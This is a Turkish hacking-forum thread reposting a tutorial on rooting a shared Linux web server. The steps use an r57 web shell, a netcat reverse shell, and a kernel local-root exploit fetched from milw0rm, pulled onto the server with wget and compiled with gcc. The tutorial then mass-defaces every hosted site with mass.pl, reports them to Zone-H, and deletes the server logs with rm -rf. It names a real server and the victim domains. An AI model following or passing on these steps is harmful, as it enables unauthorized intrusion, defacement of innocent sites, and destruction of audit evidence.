nasıl yapıyorlar?

Arkadaşım root denilen olay oldukça zordur. Eğer r57 shell hakkında fazla bilgi sahibi değilsen okuma derim bu yazıyı. Çünkü kafanı karıştırabilir biraz
Root olmak ileri seviye biraz.
Bir serverda root olabilmen için servera r57 shell yedirmen, bu servera göre bir exploit bulman gerekir. Biraz da şans Çünkü serverına göre exploit bulsan bile kesin root olabilecegimizi söyleyemeyiz..
Arşivimde root ile ilgili bir döküman var
Bu döküman linux server için...
Ancak baştan söyüyorum kafanı karıştırabilir biraz...
Ayrıca bu root konusunda en kısa zamanda bir video çekmeyi düşünüyorum...
----------------------------------------------------------------------
Gerekli olan malzemeler
-netcat
-shell (r57 önerilir)
-mass.pl
-zoneh.pl
-Bir adet index

Öncelikle netcat programının windows versiyonunu google dan bulup indirin ve "C"Klasörüne kopyalayın modeminizinde istediğiniz portunu açın forumda modeminizin nasıl portu açılacağını başka bir arkadaş anlatmıştı ondan dolayı anlatmıyorum

Netcat ve portumuzu ayarladık(ben:8888 portunu kullanacagım)

Başlat->çalıştır->cmd yazıp enterlıyoruz.Buraya nc -vv -l -p 8888 yazıyoruz ve alttaki resim karşımıza geliyor



Şimd, r57 attgımızı siteye gelip r57 sayfasının en alt kısmına geliyoruz ve resimki yeri buluyoruz



Burdaki 11457yi 8888 olarka değiştirip connecte tıklıyoruz ve bağlantıyı gerçekleştiriyoruz.

Şimdi aşağıdaki resimki gibi bağlandık



Burdada görüyoruzki serverımızın sürümü:

Linux nexus.arazel.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 i686 i38
GNU/Linux

Şimdi buna uygun linux kernel local root exploit arayacagız.milw0rm.coma girip aratıyoruz ve karşımıza exploitler geliyor.

http://www.milw0rm.com/exploits/2005

İşte kullanacagımız, serverımıza uygun local root exploit.Ama bu .c dilinde.Bunu notepade kaydedip daha sonra uzantısını .c olarka değiştiriyoruz


Kaynak: Wardom Linux Server Root "İleri Seviye Kullanıcılar İçin" - Wardom.Org

Evet üsttede göründüğü gibi ben 2.6.x.c olarak kaydettim.

Şimdi bunu serverımıza upload edelim ve derleyelim.



2.6.x.c yi ben http://parkbulvar.net/2.6.x.c olarak kendi siteme upload ettim.

Şimdi wget komutu ile benim siteden bu exploiti server'a çekelim(üstteki resim)

wget http://parkbulvar.net/2.6.x.c

eget saved dedi ve işlem tamam.Şimdi bu .c exploiti derleyeceğiz



üstteki resimde göründüğü gibi derleyelim.

Yani gcc -o root 2.6.x.c yapıyoruz.Şimdi exploitimiz derlendi ve root adını aldı.Bu root adlı derlenmiş exploite full yetki verelim;

chmod 777 root

Şimdi bu derlenmiş exploiti çalışıtralım



üstteki resimde exploitimizi çalıştırdık.Yani

./root -> exploiti çalıştırma

Daha sorna id yazarak serverdaki durumumuzu öğrenelim.

eger resimdeki gibi uid:0(root) yazıyorsa.Exploit işe yaradı, server rootlandı demektir.

Resimdede oldugu gibi serverı rootladık.

Şimdi tüm siteleri deface edeceğiz.

Serverdaki siteleri whois çekerek bakabiliriz



Whois'te 2 site gözüküyor.Napalım şansızlık

Eger whoiste domain adları yoksa ve serverdada belli değilse domain adları bakmanız gerekn yerler şuralardır.

/var/cpanel
/etc/httpd/conf/httpd.conf
etc/shadow
/var/named

Büyük ihtimalle burdaki yerlerden birinde domain adları mevcuttur.

Şimdi bizde control edelim

cd /var/named yazarak bu dizine geçiyoruz

ve ls yazarak bu dizindeki dosyaları listeliyoruz



İşte karşınızda domain isimleri.Sadece sonraki .db kısımlarını silmeniz yeterlidir.

arazel.com
brguild.com
brguild.org
clan-forsaken.com
danielhiggins.com
delucaspizzeria.com
dontknow.com
excessive-gaming.net
greyedge.com
houseforsaken.com
jeweladdict.com
keanpride.org
kindred192.com
mybox.mybox.com
named.ca
phosaigonexpress.com
webdetailing.com

Domainlerimiz üstte , şimdi bunu domain.txt olarak kaydediyoruz ve bir kenarda bekletiyoruz

Tüm siteleri deface etmek için mass.pl gereklidir. Ben size konuyla birlikte vereceğim.Şimdi mass.pl yi en başta r57.php attıgımız dizine upload ediyoruz.

perl mass.pl yazarak kullanımı karşımıza geliyor



example: perl mass.pl /tmp/index.html yazmış.

Bu şu demektir... /tmp/index.html -> burdaki indexi tüm klasörlere kopyala.

Burdaki /tmp dizini zorunlu değildir.Ben r57nin bulundugu dizini kullanacagım.

perl mass.pl /home/clanfo/domains/clan-forsaken.com/public_html/memberdb/admin/index.html

Resimdede oldugu gibi tüm siteler defacing ediliyor.



Bir kaç dakika sonra sitelerde indexini göreceksinizdir.

Şimdi sıra geldi zone-h almaya.zoneh.pl yi perl'inizin kurulu oldugu dizinde perl->bin-> buraya atıyorsunuz.

Şimdi başlat->çalıştır->cmd diyoruz ve burdan perl'in kurulu oldugunu dizinde perl->bin buraya geliyorsunuz.

Üst dizine çıkmak için cd.. , dizine girmek içi cd [dizin-adı] yapıcaksınız.
Kaynak: Wardom Linux Server Root "İleri Seviye Kullanıcılar İçin" - Wardom.Org

Buraya gelince perl zoneh.pl diyince kullanımını görelim



kullanımı: perl zoneh.pl <liste adı.txt> <ad>

Yukarda serverdaki siteleri bir txt yapıp kaydetmiştik.Onu zoneh.pl nin oldugu dizine atıyoruz ve;

perl zoneh.pl domain.txt xoron

yazıp enterlıyoruz ve eklendiğine bakıyoruz



EVET İNDEXİMİ ATILMIŞ.


SİTELERİ İNDEXLERKEN KULLANDIGIMIZ MASS.PL LOGLARI SİLECEKTİR AMA SİZ GENEDE AŞAĞIDAKİ KODLARI KULLANARAK LOGLARINIZI SERVERDAN SİLİN

rm - rf /var/log
rm - rf /var/adm
find/- name .bash_logout - exec rm - rf {} \;
find/- name *.log - exec rm - rf {} \;

Alıntıdır...
------------------------------------------------------------------------------------------

saol. bu işler bayagi karişik Valllah

Önemli değil arkadaşlar her zaman...